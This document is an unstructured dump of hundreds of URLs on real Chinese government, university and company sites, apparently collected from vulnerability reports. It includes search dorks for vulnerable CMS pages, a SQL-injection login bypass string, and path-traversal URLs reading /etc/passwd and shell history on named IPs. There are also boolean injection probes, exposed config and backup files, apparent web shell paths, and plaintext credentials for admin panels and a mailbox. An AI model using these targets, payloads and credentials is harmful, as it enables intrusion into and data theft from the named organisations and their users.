http://**.**.**/print_user.aspid=26745_ http://www.gzsdpf.org.cn/admin/OA/addinfo.php http://www.gzsdpf.org.cn/upfiles/files/gdffgd.php http://www.bio.whu.edu.cn/bkjx http://www.bio.whu.edu.cn/bkjx/ReadMe.txt http://www.bio.whu.edu.cn/db/%23data.asa http://www.bio.whu.edu.cn/sql.asp http://www.examiner.com.tw/examNews_detail.php?id=2808 http://www.examiner.com.tw/aboutUs.php?id=1 http://down.chinaz.com/soft/28252.htm inurl:line_list.asp?sid= http://www.czdfgl.com/line_list.asp?sid=2 http://6028808.net/line_list.asp?sid=3 http://www.tcxzh.com/line_list.asp?sid=6 http://www.fortour.cn/line_list.asp?sid=3 http://www.jymjly.com/line_list.asp?sid=6 http://www.66lxs.com/line_list.asp?sid=7 http://office.mingyi.com.cn/txl/manage/login.aspx http://office.mingyi.com.cn/txl/manage/Manage_list.aspx inurl:EduPlate/GoodoBlog http://www.goodo.com.cn/ http://down.chinaz.com/soft/28252.htm inurl:line.asp?id= http://www.tcxzh.com/line.asp?id=2 http://6028808.net/line.asp?id=75 http://www.zalvyou.com/line.asp?id=93 http://www.zfltour.com/line.asp?Id=223 http://www.7yoyo.cn/line.asp?id=1709 inurl:EduPlate/GoodoBlog http://www.goodo.com.cn/ http://www.jeecms.com/ http://www.jeecms.com/demo.jhtml http://demo3.jeecms.com,登录上提供的用户名和密码 https://nbp.szzfgjj.com/PTL010.revou?voureprintno=10708648 www.js.lss.gov.cn http://www.js.lss.gov.cn http://www.ujinbi.com/order.aspx/Success/2646565 http://www.ujinbi.com/order.aspx/Success/2646565 http://www.ujinbi.com/order.aspx/Success/2646563 http://www.ujinbi.com/order.aspx/Success/2646562 http://service.chinaums.com登陆处可爆破,直接进官网。。。 http://www.sxdpf.org.cn/info/info_info.aspx http://fgj.songjiang.gov.cn:8083/V4/login/logon.action http://gzf.songjiang.gov.cn:8081/Download.aspx?path=web.config http://fgj.songjiang.gov.cn:8083/V4/login/logon.action http://fgj.songjiang.gov.cn:8083/V4/login/logon.action http://61.152.219.206:8083/V4/wootest.jsp http://gzf.songjiang.gov.cn:8081/Download.aspx?path=web.config http://www.xznsyh.com/list.php?cid=212 www.txwl.cn http://www.zrh.zhenro.com/manage/login.aspx http://www.thaihot.com.cn/manage/login.aspx http://www.chinawuyi.com.cn/manage/login.aspx http://www.show-park.com/manage/login.aspx http://www.hengyugroup.com.cn/manage/login.aspx http://www.fjjinuo.com/manage/login.aspx http://www.xl-group.com.cn/manage/login.aspx http://www.wan.gov.cn/manage/login.aspx http://www.junshan.cc/manage/login.aspx Pamareter:TaskID http://zgp.njutcm.edu.cn/OpenTimsUI/AddOpenBook/AddXM_ExpOpCodeidlabtime.aspx?TaskID=1&type=stu http://202.192.18.141/OpenTimsUI/AddOpenBook/AddXM_ExpOpCodeidlabtime.aspx?TaskID=1&type=stu http://jwmis.hnie.edu.cn/sysgl/OpenTimsUI/AddOpenBook/AddXM_ExpOpCodeidlabtime.aspx?TaskID=1&type=stu http://www.gyu.cn:9100/OpenTimsUI/AddOpenBook/AddXM_ExpOpCodeidlabtime.aspx?TaskID=1&type=stu http://www.hnrku.net.cn:8003/OpenTimsUI/AddOpenBook/AddXM_ExpOpCodeidlabtime.aspx?TaskID=1&type=stu http://www.santang.com.cn/GcList.aspx?BigClassId=157&SmallClassId=158&KeyWord=&Page=1 inurl:EduPlate\RES\ inurl:RESWEB/ResWebResDetaile.aspx http://121.18.89.108/workplate/comm/xzsp/form/aspxforms/fzlist.aspx http://www.lxxzfwzx.com/workplate/comm/xzsp/form/aspxforms/fzlist.aspx http://www.wdxxzfwzx.com/workplate/comm/xzsp/form/aspxforms/fzlist.aspx http://www.gbdqyw.com/workplate/comm/xzsp/form/aspxforms/fzlist.aspx http://www.bdxzfw.cn/workplate/comm/xzsp/form/aspxforms/fzlist.aspx http://www.rzfwzx.gov.cn/workplate/comm/xzsp/form/aspxforms/fzlist.aspx http://121.18.89.108/workplate/comm/attachment/list.aspx http://www.lxxzfwzx.com/workplate/comm/attachment/list.aspx http://www.wdxxzfwzx.com/workplate/comm/attachment/list.aspx http://www.gbdqyw.com/workplate/comm/attachment/list.aspx http://www.bdxzfw.cn/workplate/comm/attachment/list.aspx http://www.rzfwzx.gov.cn/workplate/comm/attachment/list.aspx http://www.santang.com.cn/ http://zgp.njutcm.edu.cn/OpenTimsUI/STUMODEL/StuBookExpCell.aspx?codeID=1 http://expteach.gzhu.edu.cn/OpenTimsUI/STUMODEL/StuBookExpCell.aspx?codeID=1 http://jwmis.hnie.edu.cn/sysgl/OpenTimsUI/STUMODEL/StuBookExpCell.aspx?codeID=1 http://www.gyu.cn:9100/OpenTimsUI/STUMODEL/StuBookExpCell.aspx?codeID=1 http://www.hnrku.net.cn:8003/OpenTimsUI/STUMODEL/StuBookExpCell.aspx?codeID=1 inurl:IneduPortal/index.aspx http://www.yuysoft.com/index.asp http://hw.gpsisp.com/ http://gps1.gps188.com/gps/doif/myLogin.jsp http://gps2.gps188.com/gps/doif/myLogin.jsp username:admin'or'admin'='admin password:123456 http://admin.iwo.kazhu365.com/account/login http://114.247.0.113/ http://ic.szyqwz.com/cjcx/xuesheng/czjl/shuru.asp?id=1&xueke=a http://yyzx.ijd.cn/cjcx/xuesheng/czjl/shuru.asp?id=1&xueke=a http://218.78.241.94/cjcx/xuesheng/czjl/shuru.asp?id=1&xueke=a http://exam.fdfz.cn/cjcx/xuesheng/czjl/shuru.asp?id=1&xueke=a http://www.wzew.cn/cjcx/xuesheng/czjl/shuru.asp?id=1&xueke=a http://www.newclasses.org/2013ZYT/school_detail.aspx?schoolid=1 www.newclasses.org http://hnair.travelsky.com/huet/bc10/login.jsp登陆处可爆破 http://www.orico.com.cn/DriverDownload.html。 http://www.xmblxx.com/network!more.do?keytype=1&btnSubmitt=test&netkeywords=test http://www.xmxdzx.com/network!more.do?keytype=1&btnSubmitt=test&netkeywords=test http://www.sssmfx.com/network!more.do?keytype=1&btnSubmitt=test&netkeywords=test http://220.160.119.36/network!more.do?keytype=1&btnSubmitt=test&netkeywords=test http://xmxayz.com/network!more.do?keytype=1&btnSubmitt=test&netkeywords=test http://passport.chuanke.com/api/quicklogin http://www.zcqczz.com/payorder.php?xid=4081&xbusid=59 http://im.wo.com.cn/webportal//loginSp/userLogin.action http://www.hsypjg.net/login.action http://pages.chinahr.com/2012/bj/sdic_0531/jobs.asp?orgid=200309120019360005 http://pages.chinahr.com/2012/bj/sdic_0531/jobs.asp?orgid=200309120019360005’ font-size:9pt;background-color:#ddffff;padding-left:5px;display:none http://sxyjxjy.gxu.edu.cn/login.action http://www.hbtcw.com.cn/lbqs/bpm/printdccontract.aspx?bid=69&id=109 http://www.hbtcw.com.cn/lbqs/bpm/printdccontract.aspx?bid=69&id=8090 http://pmt.koukao.cn/news/getPublicExaminee.do https://vpn.dykmc.com.cn/+CSCOE+/logon.html http://drops.wooyun.org/papers/3451 http://app.quyiyuan.com:8888/APP/user/action/DataValidationActionC.jspx?_dc=1427911798753&hospitalId=&PHONE_NUMBER=手机号&modId=10001&messageType=3&op=sendRegCheckCodeActionC&loc=c&isLogin=false&hospitalID=&opVersion=1.1.80&operateUserSource=0&page=1&start=0&limit=25 http://app.quyiyuan.com:8888/APP/user/action/LoginAction.jspx?_dc=1427912093395&postdata=%7B%22PHONE_NUMBER%22%3A%2213113046783%22%2C%22USER_ID%22%3Anull%2C%22PASSWORD%22%3A%2257663e2b1322be262c4861c1af2eef98775fcd1751d14b8041dfeedf14b596f69219cd6ca2a85b71cdccc626ebe2ddc9ad7979d4eca0f6c3d6014f883223ea2a%22%2C%22ConfirmPASSWORD%22%3Anull%2C%22EMAIL%22%3Anull%2C%22NAME%22%3Anull%2C%22BIRTHDAY%22%3Anull%2C%22REGISTER_DATE%22%3Anull%2C%22REMARK%22%3Anull%2C%22SEX%22%3Anull%2C%22MEDICAL_GUIDE%22%3Anull%2C%22USER_SOURCE%22%3A%220%22%2C%22OPEN_ID%22%3Anull%2C%22PUBLIC_SERVICE_TYPE%22%3Anull%2C%22id%22%3A%22ext-record-78%22%2C%22USER_CODE%22%3A%2213113046783%22%7D&op=register&loc=c&isLogin=false&hospitalID=&opVersion=1.1.80&operateUserSource=0&page=1&start=0&limit=25 http://app.quyiyuan.com:8888/APP/user/action/LoginAction.jspx?_dc=1427912649826&userId=1200&op=queryUserInfo&isLogin=true&hospitalID=10778&opVersion=1.1.80&operateCurrent_UserId=1&operateUserSource=0&page=1&start=0&limit=25 http://app.quyiyuan.com:8888/APP/user/action/LoginAction.jspx?_dc=1427913109821&postdata=%7B%22ID_NO%22%3A%****************%22%2C%22USER_ID%22%3A%22124013%22%2C%22PASSWORD%22%3Anull%2C%22ConfirmPASSWORD%22%3Anull%2C%22EMAIL%22%3Anull%2C%22NAME%22%3A%22%5Cu5929%5Cu671d2%22%2C%22USER_CODE%22%3Anull%2C%22PHONE_NUMBER%22%3A%2213113046783%22%2C%22CARD_NO%22%3A%22Q150402000%22%2C%22BIRTHDAY%22%3A%221977-11-13%22%2C%22REGISTER_DATE%22%3Anull%2C%22SEX%22%3A%221%22%2C%22id%22%3A%22ext-record-401%22%7D&cardNo=Q150402000&userVsId=169139&op=updateuser&loc=c&isLogin=true&hospitalID=10778&opVersion=1.1.80&operateCurrent_UserId=124009&operateUserSource=0&page=1&start=0&limit=25 http://www.zara.cn/cn/ https://222.33.68.95/+CSCOE+/logon.html http://drops.wooyun.org/papers/3451 http://202.111.148.109/system/login.action http://gs.njfu.edu.cn/ http://202.203.225.17:8080/ http://218.75.27.177/ http://yjsy.wmu.edu.cn:8080/ http://101.76.99.20/ http://61.187.179.68:8080/ http://yjsy.wzmc.edu.cn:8080/ http://210.43.126.80:8080/ http://211.64.205.214/ http://www.wooyun.org/bugs/wooyun-2015-0100837_ x.php/Liuyan/show***** http://www.tass.com.cn/wwwroot.rar http://211.160.9.96:8080/ http://222.223.193.93:808/framework/Login.aspx http://e.youku.com/classify/getresource?callback=jsonp2&cid=325&_=1427920191195 http://219.232.200.42/yjrc/err/timeout.jsp http://219.232.200.42/?formAction=in&objName=AWorkInfo&operType=update&id=****** http://219.232.200.42/yjrc/person/PueryEduResumAction.do?formAction=in&applyId=******* http://yuehui.163.com/存在两处csrf导致可以刷粉等问题,一处是在关注处,另一处是在好感处 http://140.206.74.65:8888这个系统 http://140.206.74.65:8888/dn/tools/TerminalCommunicationServiceController.aspx可以未授权访问,可以重启终端等 http://www.hsypjg.net/reindex.action www.xxsjsw.gov.cn/henan/ZiXunDetail.aspx?id=10551 http://114.251.243.18/hhzp/resume.action http://www.bmc-medical.com/news_list/newsCategoryId=8.html http://www.shaolinbus.com/jjfa/&newsCategoryId=17.html http://www.lomon.com/product_sale/&newsCategoryId=21.html http://www.invenlux.com/news_list/&newsCategoryId=2.html inurl:newsCategoryId http://weixin.mangocity.com/index.php http://image.sogou.com/pics/news/detail_top.jsp?category=%E5%A8%B1%E4%B9%90&did=8&mark=1b87c65ad5f5ada2 http://175.102.14.72/vmain/login.jsp http://175.102.14.72/ServiceAction/com.velcro.base.DataAction?sql= http://175.102.14.72/ServiceAction/com.velcro.base.DataAction?sql= https://github.com/sjqzhang/stock/blob/0e6c477e9b33fb35deb5051de0345c624b462d5b/web/application/config/config.php http://mail.topsec.com.cn:8888/login.php http://mail.topsec.com.cn:8888/login_check.php http://mail.topsec.com.cn:8888/logout.php http://mail.topsec.com.cn:8888/redirect.php http://love.xdkb.net/admin/ http://wedexpo.xdkb.net/admin/Login.aspx http://ntzx.cn/home.php?action=article&id=1 http://video.nxtv.cn http://wts.dealer.easypass.cn/100000237/Ajax/GetNewsResidueDay?newsids=23999791 http://huawei-u8861-shuajibao.shuajizhijia.net http://sms.goldia.cn/sp/index_mo.asp?Mobile=13888888888 http://sms.goldia.cn/sp/index_mo.asp?Mobile=13888888888 http://qugou-inc.com/qugou/admin#thread_admin http://demo.guqiu.com/ http://demo.guqiu.com/admin/main.aspx http://demo.guqiu.com/admin/userpwd.aspx http://218.6.147.143:7000/course/jxsbazgfjbzjc/admin/main.aspx http://h5.hejian.com/api/virtual/?tag_id=91 http://cms.hejian.com/后台弱口令, http://www.mellowtour.com.tw/webobj/NewPost/ShowPost.asp?id_no=9768&postClass=1 http://drugs.medlive.cn/drugref/drugref/index.do http://drugs.medlive.cn/drugref/drugref/drug_info_search.do http://drugs.medlive.cn/drugref/drug_info_search.do http://drugs.medlive.cn/drugref/drugref/drugCheckIndex.do http://drugs.medlive.cn/drugref/drugref/drugCateIndex.do http://drugs.medlive.cn/drugref/drugref/instruction_search_init.do http://app.dejiplaza.com:1020/ http://www.qzwsw.com//Foosun_Data/FS400.mdb http://218.80.239.62:7001/defaultroot/login.jsp http://xh.cast.org.cn/cast/index/index.jsp http://210.14.113.22:8090/AQMIS/main/login.jsp网站进行验证。 system:type%3DServer system:type%3DServerInfo http://210.14.113.22:8090/shell/nice.jsp www.axgaj.gov.cn/admin/ www.axgaj.gov.cn/Login.aspx inurl:IneduPortal/index.aspx http://www.yuysoft.com/index.asp http://202.104.30.186:80/ inurl:IneduPortal/index.aspx http://www.yuysoft.com/index.asp http://www.sippr.org.cn/index.php/Home/Active/member_login http://www.sippr.org.cn/index.php/Home/Active/login https://jpaas-edu.baidu.com/ http://www.gaggzy.com/Jyweb/XXGKList.aspx?Type=信息公开&SubType=20 http://www.gaggzy.com/TrueLoreAjax/TrueLore.Web.WebUI.WebAjaxService,TrueLore.Web.WebUI.ashx Ajax-method:GetPageXXGK http://sangfor.360help.com.cn/ http://223.82.246.235:8080/mms/listMember.action http://223.82.246.235:8080/mms/listMember.action http://223.82.246.235:8080/caidao.jsp vasp:MM7Config xmlns:vasp="http://mms.chinamobile.com/mm7ConfigSchema vasp:MM7Config http://www.228.com.cn/ http://lib.uibe.edu.cn/tsg/AdvicesBaseView.aspx http://www.airfex.net/cn_asp/news_show.asp?id=885 http://dfi.bnuz.edu.cn/college/article.php?id=44 http://dfi.bnuz.edu.cn/college/article.php?id=44 http://dfi.bnuz.edu.cn/college/article.php?id=44 http://ipccs7.call4006.cn http://zxzj.sheitc.gov.cn/ http://www.zjedu.org www.zjedu.org http://gaofengsg.gotoip3.com/news_display.php?id=9 http://xsgzb.sdkd.net.cn/ziqige/admin/ http://xsgzb.sdkd.net.cn/ziqige/upfile.asp http://xsgzb.sdkd.net.cn/ziqige/c.asp http://xsgzb.sdkd.net.cn/ziqige/Admin_Login.asp http://www.cqkcy.com/product_content.php?cid=295&id=2553 http://www.cqkcy.com/test.php inurl:IneduPortal/index.aspx http://www.yuysoft.com/index.asp www.cspro.org)了一个路人账号操作。 inurl:IneduPortal/index.aspx http://www.yuysoft.com/index.asp inurl:IneduPortal/index.aspx http://www.yuysoft.com/index.asp http://www.yishion.com.cn/blog/bw8/201503223613/fan.php http://yd.zjjgs.gov.cn/ http://sz.zjjgs.gov.cn/Admin/Admin_Login.asp http://enterprise.zteusa.com http://www.nthdglc.com/t.asp?id=954 http://www.sdtvu.com.cn/jcms http://www.sdtvu.com.cn/jcms/interface/user/out_userinfo.jsp?xmlinfo=%3Cmain%3E%3Cstatus%3EQ%3C/status%3E%3C/main%3E http://hljxfxh.xicp.net:8090/login.action http://hljxfxh.xicp.net:8090/web/login.action http://www.jsgjj.cn http://vpn.bilibili.co:3000/ admin:admin inurl:index.php?sid= http://www.ykytsh.com/cp/index.php?sid=6 http://www.skodayk.com/cxzl/index.php?sid=9 http://www.ykwtdz.com/cp/index.php?sid=7 http://www.edwardlogcabin.com/index.php?sid=28 http://yktljc.com/cp/index.php?sid=4 inurl:cpzs.php?uid= http://www.ykbzj.com/cpzs.php?uid=4 http://www.yksyj.com/cpzs.php?uid=2 http://www.htzgcb.com/cpzs.php?sid=7 http://www.xpgkjs.com/cpzs.php?uid=7 http://www.ykjgdq.com/cpzs.php?uid=2 http://www.ykfhgk.com/cpzs.php?uid=4 http://www.seeyon.com/.htaccess http://www.seeyon.com/phpinfo.php http://www.seeyon.com/inc/db.php http://www.foshandb.com/newAngelOnline.rar http://www.vans-china.cn http://124.238.218.78用户名密码相通 http://www.vans-china.cn上面也能登录成功 http://www.vans-china.cn/report/spxxcxlb.jsp www.vans-china.cn http://220.180.89.90:8081/userlogin.aspx http://www.zixilib.com:8008/userlogin.aspx http://dydl.sddylib.com/userlogin.aspx http://ggg.360elib.com/userlogin.aspx http://221.1.218.166:81/userlogin.aspx http://co.dichuang.cc:85/userlogin.aspx http://218.23.126.222:999/userlogin.aspx http://60.170.103.21:81/userlogin.aspx http://zslib.org:8000/userlogin.aspx http://211.141.185.166:82/userlogin.aspx http://www.tsqtsg.cn:88/userlogin.aspx http://book.gyxtsg.org/userlogin.aspx http://120.194.7.10:8087/userlogin.aspx http://www.zixilib.com:8008/userlogin.aspx http://co.dichuang.cc:85/userlogin.aspx http://220.180.89.90:8081/userlogin.aspx http://www.tlzxx.net/tushu/userlogin.aspx http://www.tsqtsg.cn:88/userlogin.aspx http://120.194.7.10:8087/userlogin.aspx http://dealer.xcar.com.cn/newcar/admin_dealer2/sys_login.php http://kq.gxmu.edu.cn inurl:IneduPortal/index.aspx http://www.yuysoft.com/index.asp http://www.wooyun.org/bugs/wooyun-2010-0105508/trace/9c949f564ded401dd228377c516ce91e http://www.jxutcm.edu.cn/ http://www.bbepb.gov.cn/HPSP1Show.aspx?CaseNo=29243998-bf6f-4ca3-8f31-7b99ee7a6cfa&type=0&InstanceId=2a25b828-37e7-4125-b9f1-ff0cef0f5bd5 http://www.hbsyrss.gov.cn mail:jingwulianbo@qq.com pass:777777777 www.gdzs.gov.cn www.wooyun.org时 ext:lp:lp_netErrorInfo:#_NETWORK_FAIL_INFO_#;Url=http://www.example.com/;IP=1;IPNum=1 www.wooyun.org来绕过限制。 http://www.ciscn.cn/optUserInfo.action?opt=read&read=1&usercode=admin http://www.ciscn.cn/optUserInfo.action?opt=read&read=1&usercode=mowenwen http://www.ciscn.cn/optUserInfo.action?opt=edit&read=1&usercode=admin http://www.ciscn.cn/readTeamInfo.action?opt=index&teamid=12471 http://www.manzuo.com/qa/my http://www.jxkx.gov.cn/san.asp?id=13940 http://test.pipi.cn/WEB-INF/web.xml http://61.153.183.57:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://61.153.183.42:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://60.12.104.175:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://122.225.105.120:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://61.153.183.57:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/proc/self/environ http://61.153.183.57:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/webservice/.bash_history http://61.153.183.57:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/webservice/webdoc/pipi.cn/pipi_log_data/bin/ztool.db.properties http://www.qdkaiyuangroup.com/login.jsp inurl:IneduPortal/index.aspx http://www.yuysoft.com/index.asp http://cfsc.com.cn/expertQa.do?method=searchAllQuerstions&checkType=1&keyWord= https://218.57.138.29/por/login_psw.csp https://218.57.138.157/portal_default/index1.html http://60.28.57.20/admin http://setting.medlive.cn http://www.droidsec.cn/%E8%AF%A6%E8%A7%A3android-app-allowbackup%E9%85%8D%E7%BD%AE%E5%B8%A6%E6%9D%A5%E7%9A%84%E9%A3%8E%E9%99%A9/ http://211.147.135.121:8086 http://b.medlive.cn http://xdjy.cumtb.edu.cn/cjwt/shownews.php?lang=cn&id=37 http://hnhp6660201.w215.bizcn.com/news_content.asp?ID=19 http://www.eccn.com/3d/xw.txt http://211.149.173.188:7003/system/login http://119.254.70.101:8000/homelinkcb http://bfz.medlive.cn http://wooyun.org/bugs/wooyun-2015-0105083 http://le.medlive.cn/ https://pbnj.ebank.cmbchina.com http://bj.esf.sina.com.cn/ http://broker2.esf.leju.com/login?client_citycode=bj http://broker2.esf.leju.com/todayusestat/port?agentid=8116554可下架房源操作 http://bj.esf.sina.com.cn/agent/这个接口可以查看在新浪乐居上所有经纪人的信息 http://bj.esf.sina.com.cn/agentshop/8071976-2 http://broker2.esf.leju.com/todayusestat/port?agentid=8071976(上面她的id替换到这里) https://member.feiniu.com//addrlist/doModifyMem?cguid=23D06B1F-B20B-9302-7717-671934CEDC3A&username=%E6%B5%8B%E8%AF%95&mlsa01=1&mlsa02=1&mlsa03=310105&userzipcode=310105&userprovince=%E4%B8%8A%E6%B5%B7&usercity=%E4%B8%8A%E6%B5%B7%E5%B8%82&usercounty=%E9%95%BF%E5%AE%81%E5%8C%BA&csrf_token_uitox_member=&useraddr=%E6%88%91%E4%B9%9F%E4%B8%8D%E7%9F%A5%E9%81%93%E5%9C%A8%E5%93%AA%E9%87%8C11&usercell=18297557718&phoneSection=&usertel=&phoneExt= http://app.shenchuang.com http://app.shenchuang.com/info.php redis_version:2.6.12 os:Linux used_memory:856272 used_memory_human:836.20K used_memory_rss:1859584 used_memory_peak:954848 used_memory_peak_human:932.47K http://hz.gxgs.gov.cn hz.gxgs.gov.cn/jcms/interface/user/out_userinfo.jsp?xmlinfo=%3Cmain%3E%3Cstatus%3EQ%3C/status%3E%3C/main%3E http://bj.esf.sina.com.cn/ http://broker2.esf.leju.com/statnew/shopagent?excel=&currpage=&stattype=1&shopname=%C1%B4%BC%D2%B5%D8%B2%FA%B0%D7%D6%BD%B7%BB%B5%EAA%B5%EA%%27%20and%201=1%20and%20%27%%27=%27&startdate=2015-03-27&enddate=2015-04-02&page_limit=0%2C2000 http://broker2.esf.leju.com/statnew/shopagent?excel=&currpage=&stattype=1&shopname=%C1%B4%BC%D2%B5%D8%B2%FA%B0%D7%D6%BD%B7%BB%B5%EAA%B5%EA%%27%20and%201=2%20and%20%27%%27=%27&startdate=2015-03-27&enddate=2015-04-02&page_limit=0%2C2000 http://58.61.28.60:8089 http://58.61.28.60:8089/jmx-console http://58.61.28.60:8089/download/ICDCONFIG/.svn/entries http://58.61.28.60:8089/file/.svn/entries http://58.61.28.60:8089/download/14401004.sql http://58.61.28.60:8089/download/14401003.sql http://growth.medlive.cn http://119.254.231.76/gjyl http://**.**.**/index.jspID_lanmu=1 http://psy.haut.edu.cn/Test/RPT_Result_Admin.aspx?ResultID=30023 http://broker2.esf.leju.com/statclick/refstat?curpage=&date=2015-04-01*&excel=0 https://m.coolyun.com/test-annotations/ http://widget.coolyun.com/widget.zip http://broker2.esf.leju.com/todayusestat/port?agentid=8116554 http://www.jstsks.com/index.shtml http://www.hntskh.com/index.shtml http://www.ahtsks.com/index.shtml http://www.sctzsbzy.com/default.shtml http://www.hntsks.com/index.shtml http://www.gztsks.com/index.shtml http://www.jltsks.com/index.shtml http://www.gxtsks.com/index.shtml http://124.117.254.130:7001/index.shtml http://www.hbtsks.com/index.shtml http://116.53.253.7/index.shtml http://218.21.128.211:7001/index.shtml http://jk.gsgj.com.cn/index.shtml http://www.hbtskh.com/index.shtml http://www.nxtsks.com/index.shtml http://bbs.5see.com/uc_server/data/config.inc.php.bak http://www.jjce.net http://www.sl88.net/about.asp?sid=6 http://www.sl88.net/products_contrast.asp?sid=67 http://www.sl88.net/news_list.asp?sid=5 http://www.sl88.net/news_list.asp?sid=5 http://www.sl88.net/manage/Edit/admin_login.asp http://www.sl88.net/pic/2015329162917143.asa http://si.cnc.cn si.cnc.cn/search.jsp si.cnc.cn/search.jsp http://oa.998.com/login/Login.jsp?logintype=1 http://221.131.9.125:8000/logoff_submit.do http://www.wuhufucai.cn/news.php?id=22 http://www.wuhufucai.cn/admin/Admin_Login.php http://www.wuhufucai.cn/news.php?id=22 http://www.wuhufucai.cn/news.php?id=22 http://182.242.231.170:803/index.asp http://219.216.19.233:8081/index.asp http://220.165.85.220:8000/ http://vip.library.neusoft.edu.cn/index1.asp http://www.qzygz.com:8081/index1.asp http://210.44.80.46/index1.asp http://library.fjrtvu.edu.cn:1080/index1.asp http://www.cxstar.cn/ http://166.111.120.118/emlib4/format/release/aspx/eml_homepage.aspx http://202.112.181.252/emlib4/format/release/aspx/eml_homepage.aspx http://202.202.12.32/emlib4/format/release/aspx/eml_homepage.aspx http://202.120.143.35/emlib4/format/release/aspx/eml_homepage.aspx http://media.lib.sjtu.edu.cn/emlib4/format/release/aspx/eml_homepage.aspx http://www.wslh.net/index.php?m=content&c=index&a=lists&catid=2 http://v.pudongtv.cn/t/t1/user/bkzjsplb.aspx?m=1&n=1&uid=51&paixu=0&bkzjid=51 http://v.sygd.tv/t/t1/user/bkzjsplb.aspx?m=1&n=1&uid=51&paixu=0&bkzjid=51 http://v.zghhzx.com.cn/t/t1/user/bkzjsplb.aspx?m=1&n=1&uid=1&paixu=0&bkzjid=1 http://v.jjbctv.com/t/t1/user/bkzjsplb.aspx?m=1&n=1&uid=1&paixu=0&bkzjid=1 http://v.hcvw.cn/t/t1/user/bkzjsplb.aspx?m=1&n=1&uid=1&paixu=0&bkzjid=1 test1:11111 http://www.jsw.suzhou.gov.cn/szjswlogin/WebBuilderMis/webbuilder_login.aspx http://www.lfqx.com:8080/pms/showsystem/show121/showSystemShow121_toDataShow.action dir:D:\tomcat-6.0.35\webapps\pms\ http://qy.nantong.gov.cn/dic_getList.do http://qy.nantong.gov.cn/employee_getAllEmployee.do http://qy.nantong.gov.cn/executeLog_getExecuteLogList.do http://qy.nantong.gov.cn/loginLog_getLoginLogList.do http://qy.nantong.gov.cn/right_toRightMain.do http://qy.nantong.gov.cn/right_showRoleForRight.do http://qy.nantong.gov.cn/right_selectMenu.do http://qy.nantong.gov.cn/role_getRoleList.do http://qy.nantong.gov.cn/selectTree_showPopForStep.do http://qy.nantong.gov.cn/notice_toAddJsp.do http://qy.nantong.gov.cn/notice_getAllTongjiList.do http://qy.nantong.gov.cn/xmsz_getList.do http://qy.nantong.gov.cn/employee_competentLogin.do http://qy.nantong.gov.cn/xyEmployee_toAddEmployeeJsp.do http://qy.nantong.gov.cn/xyEmployee_queryAllEmployee.do http://qy.sqcz.gov.cn/xyEmployee_queryAllEmployee.do http://zdxm.nantong.gov.cn/xyEmployee_queryAllEmployee.do http://tjdata.haimen.gov.cn/xyEmployee_queryAllEmployee.do http://qyfz.czfb.gov.cn/zfzcxmgl/xyEmployee_queryAllEmployee.do http://58.221.147.11:8080/workfield/before/xyEmployee_queryAllEmployee.do http://58.221.172.42:8080/hmqlyg/xyEmployee_queryAllEmployee.do http://elqlf.haimen.gov.cn/hmqlyg/xyEmployee_queryAllEmployee.do http://cxsh.sihong.gov.cn/shcredit/xyEmployee_queryAllEmployee.do http://www.ntcredit.com/ntscredit//xyEmployee_queryAllEmployee.do http://cxsy.siyang.gov.cn/syxcredit//xyEmployee_queryAllEmployee.do http://mxzltj.nantong.gov.cn/mxzl_up//xyEmployee_queryAllEmployee.do http://58.221.206.203:8080/rgshjz//xyEmployee_queryAllEmployee.do http://58.221.172.27:8580/hmjxpg/xyEmployee_queryAllEmployee.do http://58.221.238.143:8085/qyxm/xyEmployee_queryAllEmployee.do http://58.221.238.143:8085/qyxm/xyEmployee_toAddEmployeeJsp.do http://58.221.238.143:8085/qyxm/xyEmployee_queryAllEmployee.do https://github.com/IOActive/jdwp-shellifier http://cmcc.gw.com.cn/login/check!checkuser.action http://218.30.22.96 http://218.30.22.251 http://zjdtmy.com:8888/CourseCommunity/station.action?type=7&stationCode=3307230000001382&time=20141120100103%20HTTP/1.1%20HTTP http://zjdtmy.com:8888/CourseCommunity/station.action?type=7&stationCode=3307230000001382&time=20141120100103%20HTTP/1.1%20HTTP http://zjdtmy.com:8888/CourseCommunity/station.action http://baobao.ci123.com/spaces/video/612528?tab=shipin&id=261975#top_new http://www.foyoedu.com/ http://ic.szyqwz.com/cjcx/bkxt/yqts1.asp?newsid=1 http://xszx.mhedu.sh.cn/cjcx/bkxt/yqts1.asp?newsid=1 http://www.zygz.fx.edu.sh.cn/cjcx/bkxt/yqts1.asp?newsid=1 http://zy.52sttv.com/cjcx/bkxt/yqts1.asp?newsid=1 http://www.zygz.fx.edu.sh.cn/cjcx/bkxt/yqts1.asp?newsid=1 http://blog.ci123.com/qqqccc123/photolist/134924 http://lms.ambow.net/login/toAddCompanyApply.action http://www.ibms.sinica.edu.tw/big5/pages/pi/index.php?id=86 http://www.ibms.sinica.edu.tw/big5/pages/pi/index.php?id=86 inurl:i.php?pid= http://www.yufeng111.com/s.php?classid=8&id=6&t=2&pid=5 http://www.hrb-bs.com//s.php?classid=8&id=6&t=2&pid=1 http://www.hljorient.com//s.php?classid=8&id=6&t=2&pid=1 http://www.zlanquan.com//s.php?classid=1&id=1&t=1&pid=1 http://www.yuelangzhineng.com/s.php?classid=1&id=1&t=1&pid=1 ftp://112.124.114.55/ http://www.jstour.gov.cn/jcms//interface/user/out_userinfo.jsp?xmlinfo= http://159.226.100.34:8080/guji/login.jsp http://pinyin.sogou.com/bbs/forum.php http://blog.ci123.com/qqqccc123 http://cwcx.jlsu.edu.cn/admin/admin_adminmodifypwd.aspx www.lxgajj.gov.cn/Admin_lxgajj/ad_login.asp_ http://demo.gavi.chinacdc.cn/登录系统 http://www.stats.gov.cn/tjsj/tjbz/xzqhdm/201401/t20140116_501070.html行政代码 http://219.141.175.204) https://github.com/greatfire","https://github.com/cn-nytimes https://211.154.163.90/ http://fzzzw.fjsen.com/school!area?level=-1&pop=-1&codeorname=&scope=-1&type=2&stype=1 http://tyb.njupt.edu.cn/newss.asp?id=465 http://www.ncl.uestc.edu.cn/main/admin/login.php pss.uestc.edu.cn/tasi/admin/system/fileformat.asp http://www.jxdz.uestc.edu.cn/ http://sms.7moo.com/ http://oa.china-cba.net/WebUI/Login.aspx 